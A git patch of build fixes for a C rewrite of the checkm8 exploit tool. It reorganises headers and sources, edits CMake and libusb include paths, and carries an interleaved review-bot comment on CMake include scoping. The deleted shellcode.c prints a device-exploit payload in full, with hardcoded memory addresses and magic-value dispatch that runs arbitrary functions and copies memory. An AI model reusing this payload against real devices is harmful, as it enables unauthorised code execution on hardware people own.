From bd36b6d8d22b7bfd1896f781a802e2d0951ccbdd Mon Sep 17 00:00:00 2001
From: Gregor Haas
Date: Sat, 7 Dec 2019 15:28:48 -0500
Subject: [PATCH] Build fixes
---
 CMakeLists.txt | 3 +-
 checkm8_remote/CMakeLists.txt | 8 +-
 checkm8_remote/{ => include}/checkm8.h | 0
 checkm8_remote/{ => include}/conf.h | 0
 checkm8_remote/{ => include}/libusb_helpers.h | 0
 checkm8_remote/main.c | 2 +-
 checkm8_remote/shellcode/shellcode.c | 127 ------------------
 checkm8_remote/{ => src}/commands.c | 0
 checkm8_remote/{ => src}/exploit.c | 0
 checkm8_remote/{ => src}/libusb_helpers.c | 2 +-
 libusb/config.h | 2 +-
 11 files changed, 8 insertions(+), 136 deletions(-)
 rename checkm8_remote/{ => include}/checkm8.h (100%)
 rename checkm8_remote/{ => include}/conf.h (100%)
 rename checkm8_remote/{ => include}/libusb_helpers.h (100%)
 delete mode 100644 checkm8_remote/shellcode/shellcode.c
 rename checkm8_remote/{ => src}/commands.c (100%)
 rename checkm8_remote/{ => src}/exploit.c (100%)
 rename checkm8_remote/{ => src}/libusb_helpers.c (99%)
diff --git a/CMakeLists.txt b/CMakeLists.txt
index c7390e5..3ce1e8c 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -2,8 +2,9 @@ cmake_minimum_required(VERSION 3.10)
 project(ipwndfu_rewrite_c)
 enable_language(C)
+include_directories(libusb/src/)
 add_library(checkm8_libusb
- checkm8_remote/conf.h libusb/config.h
+ checkm8_remote/include/conf.h libusb/config.h
 libusb/src/core.c libusb/src/descriptor.c libusb/src/hotplug.c libusb/src/io.c libusb/src/strerror.c libusb/src/sync.c
diff --git a/checkm8_remote/CMakeLists.txt b/checkm8_remote/CMakeLists.txt
index bdafbe2..d0775a7 100644
--- a/checkm8_remote/CMakeLists.txt
+++ b/checkm8_remote/CMakeLists.txt
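Review bot: In the top-level CMakeLists.txt hunk, `include_directories(libusb/src/)` is directory-scoped, so the vendored libusb headers land on the include path of every target defined from here down rather than only those that link `checkm8_libusb`. Attaching the path to the library after the `add_library(...)` call, `target_include_directories(checkm8_libusb PUBLIC libusb/src)`, keeps it with the target and makes explicit which header a bare `#include "libusb.h"` resolves to. The checkm8_remote/CMakeLists.txt hunk has the same pattern with `include_directories(include)`, which could become `target_include_directories(checkm8_remote PRIVATE include)` after `add_executable`. The `add_library(...)` call continues past the end of the hunk.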
@@ -1,9 +1,7 @@
 set(CMAKE_C_STANDARD 99)
 set(CMAKE_C_FLAGS -g)
-add_executable(checkm8_remote main.c conf.h
- libusb_helpers.c libusb_helpers.h exploit.c
- checkm8.h commands.c)
+include_directories(include)
+add_executable(checkm8_remote main.c src/libusb_helpers.c src/commands.c src/exploit.c)
-
-target_link_libraries(checkm8_remote libusb_checkm8 pthread udev)
\ No newline at end of file
+target_link_libraries(checkm8_remote checkm8_libusb pthread udev)
\ No newline at end of file
diff --git a/checkm8_remote/checkm8.h b/checkm8_remote/include/checkm8.h
similarity index 100%
rename from checkm8_remote/checkm8.h
rename to checkm8_remote/include/checkm8.h
diff --git a/checkm8_remote/conf.h b/checkm8_remote/include/conf.h
similarity index 100%
rename from checkm8_remote/conf.h
rename to checkm8_remote/include/conf.h
diff --git a/checkm8_remote/libusb_helpers.h b/checkm8_remote/include/libusb_helpers.h
similarity index 100%
rename from checkm8_remote/libusb_helpers.h
rename to checkm8_remote/include/libusb_helpers.h
diff --git a/checkm8_remote/main.c b/checkm8_remote/main.c
index 988ef01..9087fc6 100644
--- a/checkm8_remote/main.c
+++ b/checkm8_remote/main.c
@@ -1,5 +1,5 @@
 #include
-#include "exploit/checkm8.h"
+#include "checkm8.h"
 int main() {
diff --git a/checkm8_remote/shellcode/shellcode.c b/checkm8_remote/shellcode/shellcode.c
deleted file mode 100644
index 6e141bb..0000000
--- a/checkm8_remote/shellcode/shellcode.c
+++ /dev/null
@@ -1,127 +0,0 @@
-#define EXEC_MAGIC 0x6578656365786563
-#define DONE_MAGIC 0x646F6E65646F6E65
-#define MEMC_MAGIC 0x6D656D636D656D63
-#define MEMS_MAGIC 0x6D656D736D656D73
-
-unsigned long *LOAD_ADDRESS = 0x1800B0000;
-const unsigned long *USB_CORE_DO_IO = 0x10000DC98;
-
-
-unsigned long *memset_shellcode(unsigned long *target, unsigned long data, unsigned long nbytes)
-{
- unsigned long value = (data & 0xFFu) * 0x101010101010101;
-
- unsigned long *addr = target;
- while(nbytes >= 8)
- {
- *addr = value;
- addr++;
- nbytes -= 8;
- }
-
- if(nbytes >= 4)
- {
- *(unsigned int *) addr = (unsigned int) value;
- addr = (unsigned long *) (((unsigned int *) addr) + 1);
- nbytes -= 4;
- }
-
- if(nbytes >= 2)
- {
- *(unsigned short *) addr = (unsigned short) value;
- addr = (unsigned long *) (((unsigned short *) addr) + 1);
- nbytes -= 2;
- }
-
- if(nbytes != 0)
- {
- *(unsigned char *) addr = (unsigned char) value;
- }
-
- return target;
-}
-
-unsigned long *memcpy_shellcode(unsigned long *target, unsigned long *source, unsigned long nbytes)
-{
- unsigned long *addr = target;
- while(nbytes >= 8)
- {
- *addr = *source;
- addr++;
- source++;
-
- nbytes -= 8;
- }
-
- if(nbytes >= 4)
- {
- *(unsigned int *) addr = *(unsigned int *) source;
- addr = (unsigned long *) (((unsigned int *) addr) + 1);
- source = (unsigned long *) (((unsigned int *) source) + 1);
-
- nbytes -= 4;
- }
-
- if(nbytes >= 2)
- {
- *(unsigned short *) addr = *(unsigned short *) source;
- addr = (unsigned long *) (((unsigned short *) addr) + 1);
- source = (unsigned long *) (((unsigned short *) source) + 1);
-
- nbytes -= 2;
- }
-
- if(nbytes != 0)
- {
- *(unsigned char *) addr = *(unsigned char *) source;
- addr = (unsigned long *) (((unsigned char *) addr) + 1);
- source = (unsigned long *) (((unsigned char *) source) + 1);
-
- nbytes -= 2;
- }
-
- return target;
-}
-
-void shellcode(unsigned short length)
-{
- unsigned long *addr = LOAD_ADDRESS;
- unsigned long res;
-
- if(length + 2 == -1)
- {
- res = *LOAD_ADDRESS;
- if(res == EXEC_MAGIC)
- {
- unsigned long
- (*ptr)(unsigned long, unsigned long, unsigned long, unsigned long,
- unsigned long, unsigned long, unsigned long, unsigned long) =
- (unsigned long (*)(unsigned long, unsigned long, unsigned long, unsigned long,
- unsigned long, unsigned long, unsigned long, unsigned long)) addr[1];
-
- addr[0] = 0;
- res = ptr(addr[2], addr[3], addr[4], addr[5], addr[6], addr[7], addr[8], addr[8]);
- addr[0] = DONE_MAGIC;
- addr[1] = res;
- }
- else
- {
- if(res == MEMC_MAGIC)
- {
- addr[0] = 0;
- memcpy_shellcode(addr[2], addr[3], addr[4]);
- addr[0] = DONE_MAGIC;
- }
- else if(res == MEMS_MAGIC)
- {
- addr[0] = 0;
- memset_shellcode(addr[2], addr[3], addr[4]);
- addr[0] = DONE_MAGIC;
- }
- }
- }
-
- void (*usb_core_do_io)(unsigned char, unsigned long *, unsigned short, unsigned short) =
- (void (*)(unsigned char, unsigned long *, unsigned short, unsigned short)) USB_CORE_DO_IO;
- usb_core_do_io(0x80, addr, length + 6, 0);
-}
diff --git a/checkm8_remote/commands.c b/checkm8_remote/src/commands.c
similarity index 100%
rename from checkm8_remote/commands.c
rename to checkm8_remote/src/commands.c
diff --git a/checkm8_remote/exploit.c b/checkm8_remote/src/exploit.c
similarity index 100%
rename from checkm8_remote/exploit.c
rename to checkm8_remote/src/exploit.c
diff --git a/checkm8_remote/libusb_helpers.c b/checkm8_remote/src/libusb_helpers.c
similarity index 99%
rename from checkm8_remote/libusb_helpers.c
rename to checkm8_remote/src/libusb_helpers.c
index 7a08157..f1b3366 100644
--- a/checkm8_remote/libusb_helpers.c
+++ b/checkm8_remote/src/libusb_helpers.c
@@ -1,5 +1,5 @@
 #include "libusb_helpers.h"
-#include "../libusb/src/libusb.h"
+#include "libusb.h"
 #include
 #include
diff --git a/libusb/config.h b/libusb/config.h
index 54e812a..d441d84 100644
--- a/libusb/config.h
+++ b/libusb/config.h
@@ -1,7 +1,7 @@
 /* config.h. Generated from config.h.in by configure. */
 /* config.h.in. Generated from configure.ac by autoheader. */
-#include "../checkm8_remote/conf.h"
+#include "../checkm8_remote/include/conf.h"
 /* Default visibility */
 #define DEFAULT_VISIBILITY __attribute__((visibility("default")))